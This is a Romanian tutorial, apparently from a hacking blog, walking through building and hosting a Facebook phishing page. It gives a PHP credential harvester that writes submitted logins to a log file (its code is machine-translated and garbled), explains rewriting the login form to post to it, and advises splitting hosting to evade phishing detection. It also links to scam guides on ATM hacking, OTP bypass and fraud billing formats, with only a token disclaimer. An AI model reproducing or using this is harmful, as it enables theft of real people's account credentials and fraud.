cuprins
- cum se creează un link de phishing Facebook
- descărcarea și salvarea codului sursă
- lecția 2
- modificați fișierul HTML al paginii pentru a încorpora fișierul PHP în el.
- găzduirea fișierului PHP pentru stocarea parolei
- încărcați fișierele PHP și modificați permisiunea
- Configurarea postului.php Forum
- Concluzie
cum se creează un link de phishing Facebook
recent am întâlnit multe ghiduri despre crearea paginilor de phishing. Deși principiile din spatele fiecărui ghid sunt similare, Majoritatea soluțiilor de găzduire furnizate în ghid nu mai funcționează din cauza creșterii represiunii paginilor de phishing de către companiile de găzduire. În acest ghid, voi parcurge fiecare pas necesar pentru a crea și găzdui o pagină de phishing la alegere. Bucurați-vă!
descărcați indexul HTML al paginii web țintă
pentru a începe, trebuie să obțineți indexul HTML al paginii. Există diverse metode de a face acest lucru, există chiar șabloane online pentru site-uri populare. În acest tutorial, voi folosi cel mai de bază MOD pentru a fi cât mai prietenos cu noob.
Citește și: cum se creează un site de phishing folosind Kali linux
navigați la pagina dvs. web
în acest tutorial, am de gând să phish Facebook.
Vizualizați sursa paginii web.
în funcție de browserul dvs., pot exista diferite metode. În mod normal, se face făcând clic dreapta pe site și făcând clic pe „Vizualizare sursă”. Am făcut asta pe browserul meu și un windows ar trebui să iasă similar cu acesta:
pe caseta din dreapta este sursa site-ului. Ceea ce duce la următorul pas:
descărcarea și salvarea codului sursă
selectați caseta și copiați-lipiți totul din casetă într-un document txt. Utilizați Notepad pe windows și un program simplu de editare a textului dacă nu utilizați windows. (Nu utilizați programe precum Word sau Pages, deoarece este foarte lent). După ce ați făcut acest lucru, faceți clic pe „Salvați ca” sau orice opțiune care vă permite să salvați acel document. Pe Notepad ar trebui să arate astfel:
schimbați „salvați ca tip” la toate fișierele și schimbați codificarea în Unicode.
după aceea, denumiți documentul ” index.html”, evident, fără semnele de vorbire.
Felicitări! Ați terminat primul pas al tutorialului!
Citește și: Cum se face înșelătorie Facebook fără a fost interzis sau blocat
lecția 2
crearea unui fișier PHP pentru recoltarea parolei
fișierul PHP este practic instrumentul care recoltează parola utilizatorilor în acest scenariu. Există mai multe moduri în care puteți crea acest PHP dacă aveți cunoștințe de programare, dar dacă nu, copiați exemplarul meu PHP.
<?php
header (‘locație: facebook.com’);
$mâner = fopen („jurnal.txt”, „a”);
foreach ($_POST ca $ variabilă = > $ valoare) {
fwrite ($mâner, $ variabilă);
fwrite ($mâner, „=”);
fwrite ($mâner, $valoare);
fwrite ($mâner, „\r\n”);
}
fwrite ($mâner, „\r\n\n\n\n”);
fclose ($mâner);
ieșire;
?>
la fel ca mai sus, salvați fișierul PHP ca „toate fișierele” și ca „post.php”. Schimbați codificarea în Unicode și ar trebui să fiți gata de plecare!
modificați fișierul HTML al paginii pentru a încorpora fișierul PHP în el.
acum, trebuie să încorporăm fișierul PHP, pentru a primi parole pe care utilizatorii le trimit.
găsiți metoda de trimitere a parolei
în primul rând, trebuie să vedeți cum se ocupă site-ul web atunci când utilizatorul trimite o parolă de utilizator.
pentru Facebook, tot ce trebuie să faceți este să Ctrl-F și să tastați „=acțiune” în câmp.
acum, trebuie să înlocuiți totul în porțiunea subliniată cu „post.php”, păstrați semnele de vorbire. (doar un set vă rog).
evident, această metodă va fi diferită pentru alte site-uri web. O metodă bună de a o găsi este utilizarea instrumentului Inspect Elements în majoritatea browserelor moderne și făcând clic pe butonul de conectare. Găsiți ceva similar cu metoda de mai sus.
Citește și: aflați cum să piratați cardurile ATM, mașinile care utilizează software-ul Wizcardo
vă rugăm să rețineți: va trebui să schimbați acest lucru mai târziu când găzduiți efectiv site-ul web.
găzduirea fișierului PHP pentru stocarea parolei
acum, aici este partea suculentă, făcând site-ul dvs. fals online, astfel încât alte persoane să îl poată naviga.
puteți utiliza orice servicii de găzduire gratuite pentru a găzdui și stoca parole. Cu toate acestea, planul de găzduire trebuie să includă ceva numit „FTP”. Pentru acest tutorial, voi folosi 000webhost.
navigați la serverul FTP pentru serviciul dvs. de găzduire web
pentru acest pas, presupun că ați creat deja un site web cu serviciul dvs. de găzduire.
pentru 000webhost, pur și simplu faceți clic pe „Manager fișiere” și faceți clic pe „Încărcați fișiere”. Aici este o imagine a serverului FTP pentru 000webhost:
ignorați celelalte fișiere, acestea sunt doar câteva dintre lucrurile mele personale, care nu au legătură cu acest tutorial.
încărcați fișierele PHP și modificați permisiunea
după cum puteți vedea, am încărcat deja fișierul meu PHP. Dar trebuie doar să îl încărcați în folderul principal al serverului FTP. (Unele server FTP nu vă permite să încărcați în folderul rădăcină, trebuie doar să urmați instrucțiunile lor specifice).
acum trebuie să schimbați permisiunea la „777”, care este practic fiecare permisiune. Când vi se solicită să bifați casetele pentru permisiuni, bifați doar fiecare.
acum Puteți închide serverul FTP. Notați adresa dvs. de web!
Citește și: instrucțiuni pas pentru a ocoli verificarea OTP pe orice site web
găzduirea paginii reale de Phishing
pentru acest pas, va trebui să utilizați exact furnizorul de găzduire pe care îl folosesc, altfel veți fi interzis.
există un motiv pentru care nu folosesc același furnizor de găzduire pentru pagina mea reală și asta pentru că majoritatea furnizorilor de găzduire vor folosi un fel de scanare pentru a detecta paginile de phishing. Pot încercat mai multe servicii de găzduire în trecut și toate acestea mi-au interzis în termen de 30 de minute de la încărcarea fișierului index.
Configurarea postului.php Forum
acum, înainte de a găzdui site-ul, amintiți-vă postul.php / login formular lucru am configurat mai sus?
trebuie să găsiți din nou formularul de autentificare în index.html și înlocuiți ” post.php ” cu ” http://yourwebsiteforyourpostphpupload/post.php”, presupunând că ați încărcat în folderul rădăcină. Nu uitați să adăugați http:// în fața site-ului. Pentru a testa acest lucru, navigați la site-ul web (http://yourwebsiteforyourpostphpupload/post.php) și vedeți dacă vă redirecționează către Facebook.com, dacă o face, atunci ați lipit site-ul corect. Dacă nu, verificați dacă ați încărcat fișierul în directorul corect.
găzduirea paginii reale
navigați la htmlpasta.com. veți vedea ceva similar cu acesta:
apoi, trebuie să copiați indexul.fișier html pentru site-ul dvs. de phishing și lipiți-l aici.
Acum, faceți clic pe re și faceți clic pe Lipire, veți primi un link pentru site-ul dvs. web.
Concluzie
Felicitări! Ați terminat de găzduit primul dvs. site de phishing! Navigați la site-ul dvs. și încercați să introduceți câteva detalii de conectare false, după ce faceți clic pe butonul de conectare, ar trebui să vă redirecționeze către facebook.com.Conectați-vă la serverul FTP pe care l-ați găzduit postarea.fișier php, și ar trebui să existe un nou document numit Log.txt care este stocat în același folder ca postarea dvs.fișier php. Orice detalii de conectare trebuie stocate acolo.
Citește și: 2020 yahoo yahoo format, format de facturare, Descărcare pdf
vă rugăm să nu utilizați acest lucru în scopuri rău intenționate, utilizați-l numai pentru testarea penetrării și cu autorizarea victimei.